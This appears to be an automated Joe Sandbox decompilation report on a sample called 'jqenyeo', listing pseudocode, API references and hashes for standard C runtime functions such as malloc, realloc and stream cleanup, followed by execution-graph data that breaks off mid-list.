                                                          									_t31 = _t54 + 0x70;
                                                          									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                                          									__eflags =  *_t31;
                                                          								}
                                                          								return _t59;
                                                          							}
                                                          							L20:
                                                          							_t44 = E004024C9();
                                                          							_t59 = _t59 | 0xffffffff;
                                                          							__eflags = _t59;
                                                          							 *_t44 = 0x2a;
                                                          							goto L21;
                                                          						}
                                                          						_t59 = _v20;
                                                          						__eflags =  *(_t59 + 0x74) - 1;
                                                          						if( *(_t59 + 0x74) <= 1) {
                                                          							L15:
                                                          							_t20 = _t59 + 0x74; // 0xe1c11fe1
                                                          							__eflags = _t50 -  *_t20;
                                                          							L16:
                                                          							if(__eflags < 0) {
                                                          								goto L20;
                                                          							}
                                                          							__eflags = _t62[1];
                                                          							if(_t62[1] == 0) {
                                                          								goto L20;
                                                          							}
                                                          							L18:
                                                          							_t22 = _t59 + 0x74; // 0xe1c11fe1
                                                          							_t59 =  *_t22;
                                                          							goto L21;
                                                          						}
                                                          						_t12 = _t59 + 0x74; // 0xe1c11fe1
                                                          						__eflags = _t50 -  *_t12;
                                                          						if(__eflags < 0) {
                                                          							goto L16;
                                                          						}
                                                          						__eflags = _a4;
                                                          						_t17 = _t59 + 0x74; // 0xe1c11fe1
                                                          						_t18 = _t59 + 4; // 0x840ffff8
                                                          						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
                                                          						_t59 = _v20;
                                                          						__eflags = _t47;
                                                          						if(_t47 != 0) {
                                                          							goto L18;
                                                          						}
                                                          						goto L15;
                                                          					}
                                                          					_t55 = _a4;
                                                          					__eflags = _t55;
                                                          					if(_t55 != 0) {
                                                          						 *_t55 =  *_t62 & 0x000000ff;
                                                          					}
                                                          					_t59 = 1;
                                                          					goto L21;
                                                          				}
                                                          				_t49 = _a4;
                                                          				if(_t49 != 0) {
                                                          					 *_t49 = 0;
                                                          				}
                                                          				goto L5;
                                                          			}


















                                                          0x00409174
                                                          0x00409179
                                                          0x00409193
                                                          0x00000000
                                                          0x00409193
                                                          0x0040917b
                                                          0x00409180
                                                          0x00000000
                                                          0x00000000
                                                          0x00409185
                                                          0x004091a2
                                                          0x004091a7
                                                          0x004091aa
                                                          0x004091b1
                                                          0x004091d0
                                                          0x004091d7
                                                          0x004091d9
                                                          0x0040921d
                                                          0x00409229
                                                          0x0040922c
                                                          0x00409231
                                                          0x00409234
                                                          0x0040923a
                                                          0x0040923c
                                                          0x0040924c
                                                          0x0040924c
                                                          0x00409250
                                                          0x00409252
                                                          0x00409255
                                                          0x00409255
                                                          0x00409255
                                                          0x00409255
                                                          0x00000000
                                                          0x0040925b
                                                          0x0040923e
                                                          0x0040923e
                                                          0x00409243
                                                          0x00409243
                                                          0x00409246
                                                          0x00000000
                                                          0x00409246
                                                          0x004091db
                                                          0x004091de
                                                          0x004091e2
                                                          0x0040920b
                                                          0x0040920b
                                                          0x0040920b
                                                          0x0040920e
                                                          0x0040920e
                                                          0x00000000
                                                          0x00000000
                                                          0x00409210
                                                          0x00409214
                                                          0x00000000
                                                          0x00000000
                                                          0x00409216
                                                          0x00409216
                                                          0x00409216
                                                          0x00000000
                                                          0x00409216
                                                          0x004091e4
                                                          0x004091e4
                                                          0x004091e7
                                                          0x00000000
                                                          0x00000000
                                                          0x004091eb
                                                          0x004091f5
                                                          0x004091fb
                                                          0x004091fe
                                                          0x00409204
                                                          0x00409207
                                                          0x00409209
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00409209
                                                          0x004091b3
                                                          0x004091b6
                                                          0x004091b8
                                                          0x004091bd
                                                          0x004091bd
                                                          0x004091c2
                                                          0x00000000
                                                          0x004091c2
                                                          0x00409187
                                                          0x0040918c
                                                          0x00409190
                                                          0x00409190
                                                          0x00000000

                                                          APIs
                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004091A2
                                                          • __isleadbyte_l.LIBCMT ref: 004091D0
                                                          • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 004091FE
                                                          • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 00409234
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.289964197.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.289936903.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.289995064.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.290006359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_jqenyeo.jbxd
                                                          Similarity
                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                          • String ID: .\@
                                                          • API String ID: 3058430110-2906710320
                                                          • Opcode ID: a3a2b69d6d2b9a4b6c28d472179e9680dc856bfc5fdc6e53166ac95398402672
                                                          • Instruction ID: de8054beb32b7dc64be8669cb2ea50c94ab5c5166fc26728190ff957983d3686
                                                          • Opcode Fuzzy Hash: a3a2b69d6d2b9a4b6c28d472179e9680dc856bfc5fdc6e53166ac95398402672
                                                          • Instruction Fuzzy Hash: 0A31A130604206BFEB218E65CC48BAB7BA5FF41310F15487EE864AB2D2D738DC51DB99
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 95%
                                                          			E00408075(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                                          				void* _t7;
                                                          				void* _t8;
                                                          				intOrPtr* _t9;
                                                          				intOrPtr* _t12;
                                                          				void* _t20;
                                                          				long _t31;
                                                          
                                                          				if(_a4 != 0) {
                                                          					_t31 = _a8;
                                                          					if(_t31 != 0) {
                                                          						_push(__ebx);
                                                          						while(_t31 <= 0xffffffe0) {
                                                          							if(_t31 == 0) {
                                                          								_t31 = _t31 + 1;
                                                          							}
                                                          							_t7 = HeapReAlloc( *0x414224, 0, _a4, _t31);
                                                          							_t20 = _t7;
                                                          							if(_t20 != 0) {
                                                          								L17:
                                                          								_t8 = _t20;
                                                          							} else {
                                                          								if( *0x415060 == _t7) {
                                                          									_t9 = E004024C9();
                                                          									 *_t9 = E004024DC(GetLastError());
                                                          									goto L17;
                                                          								} else {
                                                          									if(E00406D05(_t7, _t31) == 0) {
                                                          										_t12 = E004024C9();
                                                          										 *_t12 = E004024DC(GetLastError());
                                                          										L12:
                                                          										_t8 = 0;
                                                          									} else {
                                                          										continue;
                                                          									}
                                                          								}
                                                          							}
                                                          							goto L14;
                                                          						}
                                                          						E00406D05(_t6, _t31);
                                                          						 *((intOrPtr*)(E004024C9())) = 0xc;
                                                          						goto L12;
                                                          					} else {
                                                          						E00404535(_a4);
                                                          						_t8 = 0;
                                                          					}
                                                          					L14:
                                                          					return _t8;
                                                          				} else {
                                                          					return E00407FE3(__ebx, __edx, __edi, _a8);
                                                          				}
                                                          			}









                                                          0x0040807c
                                                          0x0040808a
                                                          0x0040808f
                                                          0x0040809e
                                                          0x004080d1
                                                          0x004080a3
                                                          0x004080a5
                                                          0x004080a5
                                                          0x004080b2
                                                          0x004080b8
                                                          0x004080bc
                                                          0x0040811c
                                                          0x0040811c
                                                          0x004080be
                                                          0x004080c4
                                                          0x00408106
                                                          0x0040811a
                                                          0x00000000
                                                          0x004080c6
                                                          0x004080cf
                                                          0x004080ee
                                                          0x00408102
                                                          0x004080e8
                                                          0x004080e8
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004080cf
                                                          0x004080c4
                                                          0x00000000
                                                          0x004080ea
                                                          0x004080d7
                                                          0x004080e2
                                                          0x00000000
                                                          0x00408091
                                                          0x00408094
                                                          0x0040809a
                                                          0x0040809a
                                                          0x004080eb
                                                          0x004080ed
                                                          0x0040807e
                                                          0x00408088
                                                          0x00408088

                                                          APIs
                                                          • _malloc.LIBCMT ref: 00408081
                                                            • Part of subcall function 00407FE3: __FF_MSGBANNER.LIBCMT ref: 00407FFA
                                                            • Part of subcall function 00407FE3: __NMSG_WRITE.LIBCMT ref: 00408001
                                                            • Part of subcall function 00407FE3: RtlAllocateHeap.NTDLL(00480000,00000000,00000001,00000000,00000000,00000000,?,004045CB,00000000,00000000,00000000,00000000,?,00404480,00000018,00411FD8), ref: 00408026
                                                          • _free.LIBCMT ref: 00408094
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.289964197.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.289936903.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.289995064.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.290006359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_jqenyeo.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap_free_malloc
                                                          • String ID:
                                                          • API String ID: 1020059152-0
                                                          • Opcode ID: 203b7c5fc3a61a23da61efa24fa73c8b6d154fd32cc8f013885648f5e2350aaa
                                                          • Instruction ID: 9f8fe8c4bbd9e52b1c20aa057dcece5d638b265e9f3ef175acddb1746402e183
                                                          • Opcode Fuzzy Hash: 203b7c5fc3a61a23da61efa24fa73c8b6d154fd32cc8f013885648f5e2350aaa
                                                          • Instruction Fuzzy Hash: 2E110A32504215ABCB202F76FE0966B37A46F44364F11893FF989BA2D0DF7C8885C69C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 16%
                                                          			E004030DE(void* __ecx, intOrPtr _a4) {
                                                          				struct HINSTANCE__* _v8;
                                                          				_Unknown_base(*)()* _t4;
                                                          
                                                          				_t4 =  &_v8;
                                                          				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t4, __ecx);
                                                          				if(_t4 != 0) {
                                                          					_t4 = GetProcAddress(_v8, "CorExitProcess");
                                                          					if(_t4 != 0) {
                                                          						return  *_t4(_a4);
                                                          					}
                                                          				}
                                                          				return _t4;
                                                          			}





                                                          0x004030e2
                                                          0x004030ed
                                                          0x004030f5
                                                          0x004030ff
                                                          0x00403107
                                                          0x00000000
                                                          0x0040310c
                                                          0x00403107
                                                          0x00403111

                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,0040311D,00000000,?,00408010,000000FF,0000001E,00000000,00000000,00000000,?,004045CB), ref: 004030ED
                                                          • GetProcAddress.KERNEL32(?,CorExitProcess), ref: 004030FF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.289964197.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.289936903.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.289995064.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.290006359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_jqenyeo.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 1646373207-1276376045
                                                          • Opcode ID: e41157a03b6b2c61028faa385d86cc0ba5d050f528bde22708dc0c239dc5d6e7
                                                          • Instruction ID: 7a72415fad87126f0e2fa5a039a0ddc386d1adc0ae7252d34b4d1e54dfdeeb3d
                                                          • Opcode Fuzzy Hash: e41157a03b6b2c61028faa385d86cc0ba5d050f528bde22708dc0c239dc5d6e7
                                                          • Instruction Fuzzy Hash: 48D0123034020CBBEB109F93DE05F5A7EADDB08742F10097ABD08F51D1DA75EA309669
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040A93D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                          				intOrPtr _t25;
                                                          				void* _t26;
                                                          
                                                          				_t25 = _a16;
                                                          				if(_t25 == 0x65 || _t25 == 0x45) {
                                                          					_t26 = E0040AE8E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                          					goto L9;
                                                          				} else {
                                                          					_t34 = _t25 - 0x66;
                                                          					if(_t25 != 0x66) {
                                                          						__eflags = _t25 - 0x61;
                                                          						if(_t25 == 0x61) {
                                                          							L7:
                                                          							_t26 = E0040A9C3(_a4, _a8, _a12, _a20, _a24, _a28);
                                                          						} else {
                                                          							__eflags = _t25 - 0x41;
                                                          							if(__eflags == 0) {
                                                          								goto L7;
                                                          							} else {
                                                          								_t26 = E0040B109(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                          							}
                                                          						}
                                                          						L9:
                                                          						return _t26;
                                                          					} else {
                                                          						return E0040B048(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
                                                          					}
                                                          				}
                                                          			}





                                                          0x0040a940
                                                          0x0040a946
                                                          0x0040a9b9
                                                          0x00000000
                                                          0x0040a94d
                                                          0x0040a94d
                                                          0x0040a950
                                                          0x0040a96b
                                                          0x0040a96e
                                                          0x0040a98e
                                                          0x0040a9a0
                                                          0x0040a970
                                                          0x0040a970
                                                          0x0040a973
                                                          0x00000000
                                                          0x0040a975
                                                          0x0040a987
                                                          0x0040a987
                                                          0x0040a973
                                                          0x0040a9be
                                                          0x0040a9c2
                                                          0x0040a952
                                                          0x0040a96a
                                                          0x0040a96a
                                                          0x0040a950

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.289964197.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.289936903.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.289995064.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.290006359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_jqenyeo.jbxd
                                                          Similarity
                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                          • String ID:
                                                          • API String ID: 3016257755-0
                                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                          • Instruction ID: b85d4b3049c9008af4f0c0b863223919110253e8b4ae8400fcd67ebda280d961
                                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                          • Instruction Fuzzy Hash: 370142B214024DBBCF125E85CC11CEE3F26BF18354B598826FE1868171D33AC971AB86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 88%
                                                          			E0040412D(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                          				intOrPtr _v0;
                                                          				void* _v808;
                                                          				int _t9;
                                                          				intOrPtr _t14;
                                                          				signed int _t15;
                                                          				signed int _t17;
                                                          				signed int _t19;
                                                          				intOrPtr _t22;
                                                          				intOrPtr _t23;
                                                          				intOrPtr _t24;
                                                          				intOrPtr _t25;
                                                          				intOrPtr _t26;
                                                          				intOrPtr _t27;
                                                          				intOrPtr _t28;
                                                          				intOrPtr* _t30;
                                                          				intOrPtr* _t32;
                                                          				void* _t35;
                                                          
                                                          				_t28 = __esi;
                                                          				_t27 = __edi;
                                                          				_t26 = __edx;
                                                          				_t23 = __ecx;
                                                          				_t22 = __ebx;
                                                          				_t35 = _t23 -  *0x413500; // 0x88e7013c
                                                          				if(_t35 == 0) {
                                                          					asm("repe ret");
                                                          				}
                                                          				_t30 = _t32;
                                                          				_t9 = IsProcessorFeaturePresent(0x17);
                                                          				if(_t9 != 0) {
                                                          					_t23 = 2;
                                                          					asm("int 0x29");
                                                          				}
                                                          				 *0x414e30 = _t9;
                                                          				 *0x414e2c = _t23;
                                                          				 *0x414e28 = _t26;
                                                          				 *0x414e24 = _t22;
                                                          				 *0x414e20 = _t28;
                                                          				 *0x414e1c = _t27;
                                                          				 *0x414e48 = ss;
                                                          				 *0x414e3c = cs;
                                                          				 *0x414e18 = ds;
                                                          				 *0x414e14 = es;
                                                          				 *0x414e10 = fs;
                                                          				 *0x414e0c = gs;
                                                          				asm("pushfd");
                                                          				_pop( *0x414e40);
                                                          				 *0x414e34 =  *_t30;
                                                          				 *0x414e38 = _v0;
                                                          				 *0x414e44 =  &_a4;
                                                          				 *0x414d80 = 0x10001;
                                                          				_t14 =  *0x414e38; // 0x0
                                                          				 *0x414d3c = _t14;
                                                          				 *0x414d30 = 0xc0000409;
                                                          				 *0x414d34 = 1;
                                                          				 *0x414d40 = 1;
                                                          				_t15 = 4;
                                                          				 *((intOrPtr*)(0x414d44 + _t15 * 0)) = 2;
                                                          				_t17 = 4;
                                                          				_t24 =  *0x413500; // 0x88e7013c
                                                          				 *((intOrPtr*)(_t30 + _t17 * 0 - 8)) = _t24;
                                                          				_t19 = 4;
                                                          				_t25 =  *0x413504; // 0x7718fec3
                                                          				 *((intOrPtr*)(_t30 + (_t19 << 0) - 8)) = _t25;
                                                          				return E0040738B(_t19 << 0, "0MA");
                                                          			}




















                                                          0x0040412d
                                                          0x0040412d
                                                          0x0040412d
                                                          0x0040412d
                                                          0x0040412d
                                                          0x0040412d
                                                          0x00404133
                                                          0x00404135
                                                          0x00404135
                                                          0x004073c9
                                                          0x004073d3
                                                          0x004073da
                                                          0x004073de
                                                          0x004073df
                                                          0x004073df
                                                          0x004073e1
                                                          0x004073e6
                                                          0x004073ec
                                                          0x004073f2
                                                          0x004073f8
                                                          0x004073fe
                                                          0x00407404
                                                          0x0040740b
                                                          0x00407412
                                                          0x00407419
                                                          0x00407420
                                                          0x00407427
                                                          0x0040742e
                                                          0x0040742f
                                                          0x00407438
                                                          0x00407440
                                                          0x00407448
                                                          0x00407453
                                                          0x0040745d
                                                          0x00407462
                                                          0x00407467
                                                          0x00407471
                                                          0x0040747b
                                                          0x00407487
                                                          0x0040748b
                                                          0x00407497
                                                          0x0040749b
                                                          0x004074a1
                                                          0x004074a7
                                                          0x004074ab
                                                          0x004074b1
                                                          0x004074c2

                                                          APIs
                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004073D3
                                                          • ___raise_securityfailure.LIBCMT ref: 004074BA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.289964197.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.289936903.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.289995064.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.290006359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_jqenyeo.jbxd
                                                          Similarity
                                                          • API ID: FeaturePresentProcessor___raise_securityfailure
                                                          • String ID: 0MA
                                                          • API String ID: 3761405300-2670099660
                                                          • Opcode ID: 10687dbb931aabde788e87b565521ef1de1769e34277da068579617722567ceb
                                                          • Instruction ID: 4d7014942219b6f5ceedf13c626a08c3852bc8b33df36f437cf18d2bd91ecdc5
                                                          • Opcode Fuzzy Hash: 10687dbb931aabde788e87b565521ef1de1769e34277da068579617722567ceb
                                                          • Instruction Fuzzy Hash: A521F0B5550304DBEB11DF55FE81A907BA4BB88710F14D03AE9089B7A0E3B95A91CB4D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040196E() {
                                                          				intOrPtr _t3;
                                                          				intOrPtr _t4;
                                                          				void* _t6;
                                                          				intOrPtr _t9;
                                                          				void* _t12;
                                                          				intOrPtr _t13;
                                                          
                                                          				_t3 =  *0x416124;
                                                          				_t13 = 0x14;
                                                          				if(_t3 != 0) {
                                                          					if(_t3 < _t13) {
                                                          						_t3 = _t13;
                                                          						goto L4;
                                                          					}
                                                          				} else {
                                                          					_t3 = 0x200;
                                                          					L4:
                                                          					 *0x416124 = _t3;
                                                          				}
                                                          				_t4 = E0040456D(_t3, 4);
                                                          				 *0x416120 = _t4;
                                                          				if(_t4 != 0) {
                                                          					L8:
                                                          					_t12 = 0;
                                                          					_t9 = 0x413008;
                                                          					while(1) {
                                                          						 *((intOrPtr*)(_t12 + _t4)) = _t9;
                                                          						_t9 = _t9 + 0x20;
                                                          						_t12 = _t12 + 4;
                                                          						if(_t9 >= 0x413288) {
                                                          							break;
                                                          						}
                                                          						_t4 =  *0x416120;
                                                          					}
                                                          					return 0;
                                                          				} else {
                                                          					 *0x416124 = _t13;
                                                          					_t4 = E0040456D(_t13, 4);
                                                          					 *0x416120 = _t4;
                                                          					if(_t4 != 0) {
                                                          						goto L8;
                                                          					} else {
                                                          						_t6 = 0x1a;
                                                          						return _t6;
                                                          					}
                                                          				}
                                                          			}









                                                          0x0040196e
                                                          0x00401976
                                                          0x00401979
                                                          0x00401984
                                                          0x00401986
                                                          0x00000000
                                                          0x00401986
                                                          0x0040197b
                                                          0x0040197b
                                                          0x00401988
                                                          0x00401988
                                                          0x00401988
                                                          0x00401990
                                                          0x00401995
                                                          0x0040199e
                                                          0x004019be
                                                          0x004019be
                                                          0x004019c0
                                                          0x004019c5
                                                          0x004019c5
                                                          0x004019c8
                                                          0x004019cb
                                                          0x004019d4
                                                          0x00000000
                                                          0x00000000
                                                          0x004019d6
                                                          0x004019d6
                                                          0x004019e0
                                                          0x004019a0
                                                          0x004019a3
                                                          0x004019a9
                                                          0x004019ae
                                                          0x004019b7
                                                          0x00000000
                                                          0x004019b9
                                                          0x004019bb
                                                          0x004019bd
                                                          0x004019bd
                                                          0x004019b7

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.289964197.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.289936903.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.289995064.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.290006359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_jqenyeo.jbxd
                                                          Similarity
                                                          • API ID: __calloc_crt
                                                          • String ID: QA
                                                          • API String ID: 3494438863-1702331105
                                                          • Opcode ID: ab66dc2785c0eaa86ca07f30eb9e7e37c32c8d7cc2ef92006f770ad8a9994b00
                                                          • Instruction ID: 3e9ddad1e3de1c0e95620cbe28ab7805e9b9329235e72186096bcbda3288e2ad
                                                          • Opcode Fuzzy Hash: ab66dc2785c0eaa86ca07f30eb9e7e37c32c8d7cc2ef92006f770ad8a9994b00
                                                          • Instruction Fuzzy Hash: 27F0C8F1345201AAF714CB65BD516D56FE5E748724F21413FE640EA2E5E338C841C74C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • DecodePointer.KERNEL32(?,004017FA,00000000,00000000,00000000,00000000,00000000,00403C29,?,004039CE,00000003,00407FFF,00000000,00000000,00000000), ref: 004017CC
                                                          • __invoke_watson.LIBCMT ref: 004017E8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.289964197.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.289936903.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.289995064.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.290006359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_jqenyeo.jbxd
                                                          Similarity
                                                          • API ID: DecodePointer__invoke_watson
                                                          • String ID: 0Kw
                                                          • API String ID: 4034010525-1246214110
                                                          • Opcode ID: d2e17d451a76cd75420c9187795bf27789629b420142b2d469eafdd2ab0cb3f0
                                                          • Instruction ID: c97e1cab28a9a0a5774540a9f45a6d0117cf2650b7669a4f547a1e58f4d2c784
                                                          • Opcode Fuzzy Hash: d2e17d451a76cd75420c9187795bf27789629b420142b2d469eafdd2ab0cb3f0
                                                          • Instruction Fuzzy Hash: 99E0EC35110109BBDF022F62DD098AA3A69BB14754B404435FE0092571DA37C971ABA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:2.8%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:1616
                                                          Total number of Limit Nodes:25
                                                          execution_graph 7303 405fe0 RtlUnwind 7548 402580 7549 4025b7 7548->7549 7550 4025aa 7548->7550 7552 40412d __setmbcp_nolock 6 API calls 7549->7552 7551 40412d __setmbcp_nolock 6 API calls 7550->7551 7551->7549 7554 4025c7 __except_handler4 7552->7554 7553 4026df 7554->7553 7555 402694 __except_handler4 7554->7555 7560 40261e __IsNonwritableInCurrentImage 7554->7560 7555->7553 7556 4026cf 7555->7556 7558 40412d __setmbcp_nolock 6 API calls 7555->7558 7557 40412d __setmbcp_nolock 6 API calls 7556->7557 7557->7553 7558->7556 7566 402c02 RtlUnwind 7560->7566 7561 40265c __except_handler4 7562 4026f6 7561->7562 7564 40412d __setmbcp_nolock 6 API calls 7561->7564 7563 40412d __setmbcp_nolock 6 API calls 7562->7563 7565 402706 __except_handler4 7563->7565 7564->7562 7566->7561 7304 4019e1 7311 4042c9 7304->7311 7307 4019f4 7309 404535 _free 55 API calls 7307->7309 7310 4019ff 7309->7310 7324 4042d2 7311->7324 7313 4019e6 7313->7307 7314 404182 7313->7314 7315 40418e __ioinit 7314->7315 7316 4043b6 __lock 55 API calls 7315->7316 7317 40419a 7316->7317 7318 4041ff 7317->7318 7321 4041d3 DeleteCriticalSection 7317->7321 7341 40752f 7317->7341 7354 404216 7318->7354 7323 404535 _free 55 API calls 7321->7323 7322 40420b __ioinit 7322->7307 7323->7317 7325 4042de __ioinit 7324->7325 7326 4043b6 __lock 55 API calls 7325->7326 7333 4042ed 7326->7333 7327 40438b 7337 4043ad 7327->7337 7329 401a47 __getstream 56 API calls 7329->7333 7330 404397 __ioinit 7330->7313 7332 40421f 79 API calls __fflush_nolock 7332->7333 7333->7327 7333->7329 7333->7332 7334 40437a 7333->7334 7335 401ab1 __getstream 2 API calls 7334->7335 7336 404388 7335->7336 7336->7333 7340 404520 LeaveCriticalSection 7337->7340 7339 4043b4 7339->7330 7340->7339 7342 40753b __ioinit 7341->7342 7343 407567 7342->7343 7344 40754f 7342->7344 7346 401a08 __lock_file 56 API calls 7343->7346 7351 40755f __ioinit 7343->7351 7345 4024c9 ___strgtold12_l 55 API calls 7344->7345 7347 407554 7345->7347 7348 407579 7346->7348 7349 4017ee ___strgtold12_l 8 API calls 7347->7349 7357 4074c3 7348->7357 7349->7351 7351->7317 7416 404520 LeaveCriticalSection 7354->7416 7356 40421d 7356->7322 7358 4074d2 7357->7358 7359 4074e6 7357->7359 7360 4024c9 ___strgtold12_l 55 API calls 7358->7360 7371 4074e2 7359->7371 7376 404265 7359->7376 7361 4074d7 7360->7361 7363 4017ee ___strgtold12_l 8 API calls 7361->7363 7363->7371 7367 40194a __fflush_nolock 55 API calls 7368 407500 7367->7368 7386 408350 7368->7386 7370 407506 7370->7371 7372 404535 _free 55 API calls 7370->7372 7373 40759e 7371->7373 7372->7371 7374 401a77 __wfsopen 2 API calls 7373->7374 7375 4075a4 7374->7375 7375->7351 7377 404278 7376->7377 7381 40429c 7376->7381 7378 40194a __fflush_nolock 55 API calls 7377->7378 7377->7381 7379 404295 7378->7379 7380 40768f __write 75 API calls 7379->7380 7380->7381 7382 4090f1 7381->7382 7383 4090fe 7382->7383 7385 4074fa 7382->7385 7384 404535 _free 55 API calls 7383->7384 7383->7385 7384->7385 7385->7367 7387 40835c __ioinit 7386->7387 7388 408380 7387->7388 7389 408369 7387->7389 7391 40840b 7388->7391 7393 408390 7388->7393 7390 402495 __read_nolock 55 API calls 7389->7390 7392 40836e 7390->7392 7394 402495 __read_nolock 55 API calls 7391->7394 7395 4024c9 ___strgtold12_l 55 API calls 7392->7395 7396 4083b8 7393->7396 7397 4083ae 7393->7397 7398 4083b3 7394->7398 7399 408375 __ioinit 7395->7399 7401 404f29 ___lock_fhandle 56 API calls 7396->7401 7400 402495 __read_nolock 55 API calls 7397->7400 7403 4024c9 ___strgtold12_l 55 API calls 7398->7403 7399->7370 7400->7398 7402 4083be 7401->7402 7404 4083d1 7402->7404 7405 4083dc 7402->7405 7406 408417 7403->7406 7408 40842b __close_nolock 58 API calls 7404->7408 7409 4024c9 ___strgtold12_l 55 API calls 7405->7409 7407 4017ee ___strgtold12_l 8 API calls 7406->7407 7407->7399 7410 4083d7 7408->7410 7409->7410 7412 408403 7410->7412 7415 4052cf LeaveCriticalSection 7412->7415 7414 408409 7414->7399 7415->7414 7416->7356 7815 401623 7818 402c81 7815->7818 7819 402f29 __getptd_noexit 55 API calls 7818->7819 7820 401634 7819->7820 7821 